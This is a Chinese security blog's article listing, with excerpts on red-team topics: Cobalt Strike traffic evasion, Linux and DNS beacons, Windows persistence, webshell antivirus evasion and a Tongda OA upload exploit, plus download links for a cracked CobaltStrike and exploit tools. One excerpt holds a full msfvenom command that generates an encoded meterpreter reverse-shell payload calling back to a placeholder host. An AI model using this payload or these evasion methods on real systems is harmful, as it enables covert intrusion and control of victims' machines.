自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

谢公子的博客

一个小帅哥,热爱技术。很努力、很自信、很优秀

  • 博客(17)
  • 资源 (19)
  • 论坛 (1)
  • 收藏
  • 关注

原创 红蓝对抗之邮箱入口

在红蓝对抗中,邮箱是一个非常重要的一个入口。针对邮箱攻击有几个思路:能否爆破出可用的邮箱账号进行登录 能否伪造任意用户发送邮件进行鱼叉钓鱼 邮箱系统是否有漏洞

2020-05-31 10:25:19 1685

原创 CobaltStrike证书修改躲避流量审查

在红蓝对抗中,防守方往往会有很多的设备审计流量。Cobalt Strike 服务端和客户端是通过 SSL 加密通讯的,默认情况下的SSL配置文件和代理配置文件导致 keystore 文件内容被用于防火墙识别。

2020-05-30 22:01:03 1705

原创 CobaltStrike上线Linux主机(CrossC2)

在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,CobaltStrike能否对Linux主机进行长期远控呢?在上一篇文章中我提到了,CobaltStrike自身上线Linux主机的情况,需要知道对方Linux主机的账号密码或SSH秘钥,并且还需要获取一台其他机器权限作为中继。本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell。...

2020-05-30 21:14:21 3236

原创 网络空间搜索引擎Fofa的简单使用

FofaFofa 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配。例如进行漏洞影响范围分析、应用分布统计、应用流行度等。在渗透测试过程中,Fofa能帮助测试人员快速发现目标资产。查找使用指定应用的IPapp="Coremail" #查找使用Coremail的网站app="BEA-WebLogic-Server" #查找使用Weblogic的网站app="CCTV-Cameras"

2020-05-29 15:24:31 1227

原创 CobaltStrike中DNS Beacon的使用

在之前的文章中我介绍了使用 DNS-Shell 和 Dnscat2 利用DNS协议来进行命令控制,通过DNS协议进行通信,使得流量更加隐秘,躲避agent/DLP等安全设备的检测,实现相对隐秘的命令控制。传送门:使用DNS进行命令控制(DNS-Shell) 、使用DNS进行命令控制(dnscat2)本节我将介绍如何使用CobaltStrike中的DNS Beacon利用DNS协议进行命令控制。...

2020-05-29 13:51:07 819

原创 Windows权限维持

目录创建隐蔽账号进程迁移启动目录横向渗透在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。比如采取以下几点措施:查杀木马进程 重启主机 断网 关闭主机而对于我们维持权限,可以有以下几点:创建隐蔽账号如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。或者读取该主机administrator账号密码,使用

2020-05-28 22:21:05 602

原创 webshell脚本的免杀(二)

脚本木马的免杀Web端木马一般是中国菜刀的一句话木马、中国蚁剑马、冰蝎马、还有各种各样脚本的大马。Web端木马的查杀一般是WAF通过分析流量来进行截断。在WAF的规则里面有这些木马的流量特征,只要WAF匹配到了木马的流量特征,就会对木马请求的流量进行截断丢弃。所以,Web端木马免杀实质就是要对木马通信流量做混淆,以达到WAF匹配不到该木马流量的目的。目前,像中国菜刀、中国蚁剑这种木马,其通信流量是很容易被WAF给检测到的。而冰蝎是目前最流行的Web木马,其通过动态二进制加密流量,可以躲避很多WAF的查杀

2020-05-28 10:00:00 591

原创 WebSocket

在渗透测试过程中,好几次碰到了WebSockets。使用BurpSuite抓包,服务器端一直会返回这种类型的数据包。本着学习的精神,百度了一番,结果如下:WebSocket什么是WebSocket?看过html5的同学都知道,WebSocket protocol 是HTML5一种新的协议。它是实现了浏览器与服务器全双工通信(full-duplex)。HTML5定义了WebSocket协议,能更好的节省服务器资源和带宽并达到实时通讯。现在我们来探讨一下html5的WebSocket概念H

2020-05-26 14:19:38 370

原创 MSF木马的免杀(三)

目录MSF木马的免杀MSF木马的免杀MSF下输入,生成免杀shellcodemsfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c这

2020-05-26 09:43:30 1885

原创 Ladon的用法

项目地址:https://github.com/k8gege/Ladon程序简介Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、

2020-05-24 17:54:34 844

原创 CobaltStrike加载插件

首先,安装MS17-010的插件

2020-05-12 23:59:51 2169

原创 通达OA低版本文件上传+apache解析漏洞getshell

目录漏洞文件漏洞利用条件漏洞复现漏洞文件 /general/vmeet/privateUpload.php漏洞利用条件通达OA低版本 apache存在解析漏洞漏洞复现测试环境:通达OA 2008,apache存在解析漏洞首先访问是否存在该文件存在的话,将下面代码保存后缀为1.html文件,然后将木马命名为 aaa.php.1,与1.html在同一个目录下<form id="frmUpload" enctype="multipart/for..

2020-05-12 20:20:10 514

原创 域内创建机器用户

在默认情况下,经过身份验证的域内用户可以创建十个机器账户,这个数量是由域控的ms-DS-MachineAccountQuota属性决定。官方参考:https://support.microsoft.com/en-us/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain如果用户创建第十一个机器账户,则会报如下错误:被创建的机器用户的mS-DS-CreatorSID属性的值是创建用户的

2020-05-08 23:09:38 412

原创 python连接AD活动目录(ldap3模块)

库地址:https://github.com/cannatag/ldap3。官方文档:https://ldap3.readthedocs.io/en/latest/ldap3是严格按照RFC4510标准的LDAPV3的python客户端库包,支持python2和python3。...

2020-05-04 22:30:20 618

原创 反弹shell失败的几种原因

在实战中,我们经常会遇到各种各样奇怪的环境。反弹shell失败的原因有很多:反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议反弹的命令不存在或当前用户无权限调用bash由于这种情况下只局限于Linux,所以不考虑Windows反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以#bas...

2020-05-03 18:33:49 1849 1

原创 Linux利用iptables做端口复用

在做渗透测试的过程中,我们经常会遇到下面这种问题。目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是该主机的22端口不对外开放。现在我们想远程SSH连接到目标主机。...

2020-05-02 18:17:42 620

原创 MSF搭建socks代理

目录搭建代理添加路由​搭建Socks4a代理搭建Socks5代理连接代理搭建代理当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用socks4a和socks5进行代理。socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口...

2020-05-01 00:09:53 2236

通达OA2017;通达OA2017

通达OA2017;通达OA2017

2021-01-03

CVE-2017-12615-master.zip

CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;

2019-09-04

oracle11.2安装包.zip

oracle11.2安装包.zip

2020-03-05

Scrapy依赖包.zip

Scrapy的依赖包

2019-12-31

platform-tools.zip

ADB调试工具;ADB调试工具;ADB调试工具;ADB调试工具;

2019-09-10

NTLM2(工作组).pcapng

NTLMv2数据包

2019-09-09

安卓反编译三件套.zip

安卓反编译三件套(apktools/dex2jar/jd-gui)。安卓反编译三件套(apktools/dex2jar/jd-gui)。

2019-09-09

icmp命令控制和隧道工具.zip

icmp命令控制和隧道工具;

2019-08-23

Fast Reverse Proxy.zip

FRP一款好用的内网穿透工具;FRP一款好用的内网穿透工具;

2019-08-12

Metasploit.zip

Metasploit安装包

2019-08-11

shiro反序列化复现.zip

shiro反序列化复现工具包;shiro反序列化复现工具包;

2019-08-03

ysoserial-0.0.6-SNAPSHOT-all.jar

ysoserial-0.0.6-SNAPSHOT-all.jar;

2019-08-03

Java反序列化工具.zip

java反序列化工具;weblogic反序列化工具;jboss反序列化工具。

2019-05-31

python打印变换特定字符

Python打印变换特定字符,Python2和Python3皆可用!

2019-04-30

CobaltStrike

CobaltStrike破解版;

2019-04-26

手机号码归属地查询

全国手机号码归属地查询,全国手机号码归属地查询,全国手机号码归属地查询

2019-04-16

CVE-2017-12615利用脚本

CVE-2017-12615利用脚本;tomcat服务器PUT上传导致命令执行。

2019-04-16

Struts2漏洞检查工具

struts2检查和利用工具!

2019-02-14

jboss-CVE-2017-12149

Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149。

2019-01-22

谢公子的留言板

发表于 2020-01-02 最后回复 2020-08-08

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除